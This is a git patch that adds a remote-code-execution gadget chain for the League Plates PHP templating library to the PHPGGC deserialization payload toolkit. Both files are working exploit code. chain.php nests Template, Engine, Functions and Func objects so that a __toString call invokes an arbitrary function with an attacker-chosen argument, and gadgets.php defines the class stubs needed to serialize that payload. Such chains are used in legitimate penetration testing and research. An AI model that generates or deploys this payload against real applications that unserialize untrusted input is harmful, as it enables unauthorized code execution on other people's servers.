From 5c44bed1549d02e85b23092e856eb386a7a3786d Mon Sep 17 00:00:00 2001
From: Tris0n <murilocaixeta.udi@gmail.com>
Date: Sun, 5 Jan 2025 15:04:44 -0300
Subject: [PATCH] added Plates RCE gadget chain

---
 gadgetchains/Plates/RCE/1/chain.php   | 28 ++++++++++++
 gadgetchains/Plates/RCE/1/gadgets.php | 61 +++++++++++++++++++++++++++
 2 files changed, 89 insertions(+)
 create mode 100644 gadgetchains/Plates/RCE/1/chain.php
 create mode 100644 gadgetchains/Plates/RCE/1/gadgets.php

diff --git a/gadgetchains/Plates/RCE/1/chain.php b/gadgetchains/Plates/RCE/1/chain.php
new file mode 100644
index 00000000..0d0829ee
--- /dev/null
+++ b/gadgetchains/Plates/RCE/1/chain.php
@@ -0,0 +1,28 @@
+<?php
+namespace GadgetChain\Plates;
+
+class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '3.5.0 >= 3.6.0';
+    public static $vector = '__toString';
+    public static $author = 'Tris0n';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \League\Plates\Template\Template(
+            new \League\Plates\Template\Template(
+                new \League\Plates\Engine(
+                    new \League\Plates\Template\Functions(
+                        new \League\Plates\Template\Func(
+                            $function
+                        )
+                    )
+                )
+            ),
+            $parameter
+        );
+    }
+}
diff --git a/gadgetchains/Plates/RCE/1/gadgets.php b/gadgetchains/Plates/RCE/1/gadgets.php
new file mode 100644
index 00000000..267d444a
--- /dev/null
+++ b/gadgetchains/Plates/RCE/1/gadgets.php
@@ -0,0 +1,61 @@
+<?php
+
+namespace League\Plates\Template
+{
+    class Template
+    {
+        protected $name;
+        protected $engine;
+
+        public function __construct(object $Engine, string $parameter = null)
+        {
+            if($parameter !== null)
+            {
+                $this->name = $parameter;
+            }
+
+            $this->engine = $Engine;
+        }
+    }
+
+    class Functions
+    {
+        protected $functions = array();
+
+        public function __construct(object $Func)
+        {
+            $this->functions = [
+                "getResolveTemplatePath" => $Func
+            ];
+        }
+    }
+
+    class Func
+    {
+        protected $callback;
+        protected $name;
+
+        public function __construct($function)
+        {
+            $this->name = $function;
+
+            $this->callback = [
+                $this,
+                'getName'
+            ];
+        }
+    }
+}
+
+namespace League\Plates
+{
+    class Engine
+    {
+        protected $functions;
+        
+        public function __construct(object $Functions)
+        {
+            $this->functions = $Functions;
+        }
+    }
+}
\ No newline at end of file